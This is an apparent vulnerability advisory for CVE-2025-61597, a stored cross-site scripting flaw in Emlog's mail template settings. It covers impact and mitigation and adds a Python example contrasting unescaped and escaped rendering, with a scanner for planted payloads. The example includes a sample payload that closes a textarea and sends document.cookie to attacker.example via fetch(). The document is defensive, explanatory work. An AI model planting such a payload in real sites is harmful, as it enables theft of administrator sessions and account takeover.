CVE-2025-61597
BaseFortify

Publication date: 2025-10-03

Last updated on: 2025-10-20

Assigner: GitHub, Inc.

Description
Emlog is an open source website building system. In versions 2.5.21 and below, an HTML template injection allows stored cross‑site scripting (XSS) via the mail template settings. Once a malicious payload is saved, any subsequent visit to the settings page in an authenticated admin context will execute attacker‑controlled JavaScript, enabling session/token theft and full admin account takeover. This issue is fixed in version 2.5.22.
Meta Information
Generated
2026-06-16
EPSS Evaluated
2026-06-15
Affected Vendors & Products
Vendor: emlog
Product: emlog
Version / Range: up to and including 2.5.19 (per the single associated CPE)

Note: the CPE range recorded here stops at 2.5.19, while the advisory text above states that all versions up to and including 2.5.21 are affected and that 2.5.22 contains the fix. When checking an install, go by the advisory text and treat anything below 2.5.22 as affected.
CWE
CWE-79: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Executive Summary

In Emlog 2.5.21 and earlier, the value saved in the mail template settings is written back into the admin settings page without being neutralized (HTML template injection). An attacker who can get a payload into that setting therefore plants a stored cross-site scripting (XSS) payload: it runs in the browser of every administrator who later opens the settings page, inside that administrator's session, so it can read session cookies or tokens and act as the admin. Version 2.5.22 contains the fix.

Impact Analysis

The script executes with the privileges of the logged-in administrator's browser session. It can read the session cookie or any token present on the page and send them to the attacker, or issue authenticated requests directly, which amounts to full admin account takeover. On a website building system that means control over the site's content and configuration and over any data reachable through the admin interface.

Mitigation Strategies

Upgrade Emlog to 2.5.22 or later; that release contains the fix for the HTML template injection behind this stored XSS. Until the upgrade is applied, limit who can edit the mail template settings to trusted administrators. If a malicious payload may already be stored, do not check by opening the settings page in an admin session, since that is exactly what triggers it; read the stored template value out of band instead (directly from the database or with a non-browser client), clean it, and then rotate admin passwords and invalidate existing admin sessions in case tokens were already stolen. A Content-Security-Policy that disallows inline scripts on admin pages limits the impact but does not replace the upgrade.
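The CWE-79 pattern behind this advisory, as an added example that is not Emlog's code and not taken from the advisory: a hypothetical settings page that writes a saved mail template into its own HTML, first unescaped (the vulnerable shape) and then escaped at the output point, plus the out-of-band check on the raw stored value recommended above. Python's html.escape stands in for PHP's htmlspecialchars(); the form markup, the setting name, the sample payload and the token value are all constructed for this illustration and do not reflect Emlog's actual markup or schema.

```python
"""Stored XSS through an unescaped settings value (CWE-79).

Added example, not Emlog's code: a hypothetical admin settings page that
writes a saved "mail template" into its own HTML. The form markup, setting
name, sample payload and token are all constructed for this illustration.
"""
import html
import re

# Constructed sample values for the stored mail template setting.
BENIGN_TEMPLATE = "Hello {user}, your comment on <b>{post}</b> was approved."
MALICIOUS_TEMPLATE = (
    "Hello {user},</textarea>"
    '<script>fetch("https://attacker.example/?c="'
    "+encodeURIComponent(document.cookie))</script>"
    "<textarea>"
)

# Hypothetical settings form; {value} is where the stored template lands.
SETTINGS_FORM = (
    '<form method="post" action="/admin/settings">'
    '<textarea name="mail_template">{value}</textarea>'
    '<input type="hidden" name="token" value="{token}">'
    "</form>"
)


def render_settings_vulnerable(template: str, token: str) -> str:
    """Vulnerable shape: the stored value is concatenated into the page as-is.

    The payload closes the <textarea>, so its <script> becomes live markup
    that runs in whichever admin browser next opens the page.
    """
    return SETTINGS_FORM.format(value=template, token=token)


def render_settings_fixed(template: str, token: str) -> str:
    """Hardened shape: HTML-escape every stored value at the output point.

    html.escape(..., quote=True) is the Python stand-in for PHP's
    htmlspecialchars($v, ENT_QUOTES | ENT_HTML5, 'UTF-8'); the browser then
    shows the payload as text instead of parsing it.
    """
    return SETTINGS_FORM.format(
        value=html.escape(template, quote=True),
        token=html.escape(token, quote=True),
    )


_SCRIPT_OPEN = re.compile(r"<\s*script\b", re.IGNORECASE)
_EVENT_HANDLER = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)
_RAW_TEXT_CLOSE = re.compile(r"</\s*(textarea|title|style|script)\b", re.IGNORECASE)


def live_script_tags(page: str) -> int:
    """Counts <script> openings the browser would parse in the final HTML."""
    return len(_SCRIPT_OPEN.findall(page))


def inspect_stored_template(value: str) -> list[str]:
    """Out-of-band check of a stored template (e.g. read from the database).

    Run this on the raw setting value instead of opening the admin page, so
    a planted payload is found without an admin browser executing it.
    Returns the indicators found; an empty list means nothing suspicious.
    """
    findings = []
    if _SCRIPT_OPEN.search(value):
        findings.append("script tag")
    if _EVENT_HANDLER.search(value):
        findings.append("inline event handler attribute")
    if _RAW_TEXT_CLOSE.search(value):
        findings.append("closing tag that escapes a raw-text element")
    return findings


if __name__ == "__main__":
    for name, tpl in (("benign", BENIGN_TEMPLATE), ("malicious", MALICIOUS_TEMPLATE)):
        vuln = render_settings_vulnerable(tpl, "t0k3n")
        fixed = render_settings_fixed(tpl, "t0k3n")
        print(f"{name}: stored-value indicators={inspect_stored_template(tpl)}")
        print(f"  vulnerable page live scripts={live_script_tags(vuln)}")
        print(f"  fixed page live scripts={live_script_tags(fixed)}")
```

The benign template keeps its `<b>` tag and is not flagged, which is the point of escaping at output rather than filtering at input: the fixed renderer shows every stored value as text, so the admin page is safe regardless of what was saved, while the inspection helper only tells you whether something worth cleaning is already sitting in the setting.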
